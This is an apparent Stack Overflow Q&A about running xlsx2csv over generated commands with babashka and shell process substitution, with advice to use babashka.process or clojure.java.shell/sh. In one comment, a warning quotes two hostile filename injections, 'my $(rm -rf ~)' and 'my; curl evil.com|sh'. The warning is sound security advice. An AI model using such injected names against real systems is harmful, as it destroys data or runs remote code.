# babashka: no such file or directory

Tags: clojure, babashka

I want to execute:

```
xlsx2csv ./mytest
```

And this works when i type and execute it, but when i use babashka it does not work:

```
source <(ls my* | bb -i '(map #(str "xlsx2csv " %) *input*)')
/proc/self/fd/11:1: no such file or directory: xlsx2csv mytest
```

What am i doing wrong here?

Comment: What the heck is `load source <somefile>`? I'm aware of `source <file>`, but I've never seen the `load` prefix. Whatever input format it wants, you're not giving it; but I can't really say what to fix on the Clojure side because the desired input is a mystery. babashka is successfully outputting strings like `xlsx2csv mytest`, which it sounds like is what you meant but isn't what `load source` wants.

Comment: Load just comes from the shell

Comment: `<(...)` is bash-only syntax; it is not supported by `sh`, and it's very unsurprising for any kind of translation layer to skip such obscure, non-POSIX-y features. Even bash itself had bugs combining `source` and process substitution for a long while.

Comment: Is there a workaround for this? @CharlesDuffy

Comment: I'd try `eval "$(...)"` instead of `source <(...)` as a less-obscure form

Comment: Mind, piping from `ls` is itself a code smell. See [ParsingLs](https://mywiki.wooledge.org/ParsingLs) -- `ls` output is formatted for human readers, not programmatic consumers.

Comment: Mind, using `eval` or `source` to execute generated code is an even _worse_ smell, one that implies likely security bugs.

Comment: (the non-smelly way to list files in a way meant for unambiguous programmatic consumption is to use `printf '%s\0' my*`, and then parse the resulting NUL-delimited stream; because filenames can contain newline literals, newline-delimited streams aren't a safe way to represent lists of arbitrary files).

Comment: Anyhow -- you'd do much better to `(require '[clojure.java.shell :refer [sh]])`, and then `(sh "xlsx2csv" %)` in your loop, avoiding code generation.

Comment: (aside: earlier, I was confusing babashka with a different project, written by pallet's authors, that actually _generated_ shell scripts from Clojure; the rambling about "translation layer[s]" should be ignored).

Answer (score 4):

I am not really sure, why to use Babashka for one step of the
transformation, which basically only prefixes a filename with a command.
If your filenames are "sane", this is just prefixing a string which
could as well be done with `sed` or `awk`. And if they are "tricky" (as
already pointed out in the comments), this won't cut it.

So may I suggest to use Babashka instead of a shell for all the work.

```
(ns script
  (:require [babashka.fs]
            [babashka.process]))

(defn xlsx2csv
  [file-name]
  (->
    (babashka.process/process ["xlsx2csv" file-name] {:out :inherit})
    (babashka.process/check)))

(run!
  xlsx2csv
  (babashka.fs/glob "." "*.xlsx"))
```

Answer (score 0):

```
source =(ls my* | bb -i -o '(map #(str "xlsx2csv " % ) *input*)') >> test.csv
```

I forgot the -o option.

Comment: This tells us you're using zsh, not bash; `=(...)` isn't supported in bash at all.

Comment: That said, from a security perspective, this is a **really** bad idea. If someone runs `touch 'my $(rm -rf ~)'` in your working directory (uploads a file with the name thus created, etc) and then you run this code, you're going to have an _extremely_ bad day. Same for a file created with `touch 'my; curl evil.com|sh'` or any number of other syntactically valid names.

Comment: ...if you use the `(sh "xlsx2csv" %)` approach, you avoid those issues.

Comment: why does sh in clojure avoid these issues? @CharlesDuffy

Comment: `clojure.java.shell/sh` isn't really invoking a shell. Instead, it's calling `Runtime.exec()` with an explicit argument vector. Because there's no shell, there's nothing to misunderstand a filename containing `$(rm -rf ~)` as if it were code.

Comment: To be clear, it's not as if using a shell is intrinsically dangerous. It's telling a shell to parse data as code that's intrinsically dangerous, but that's exactly what `eval` or `source` do.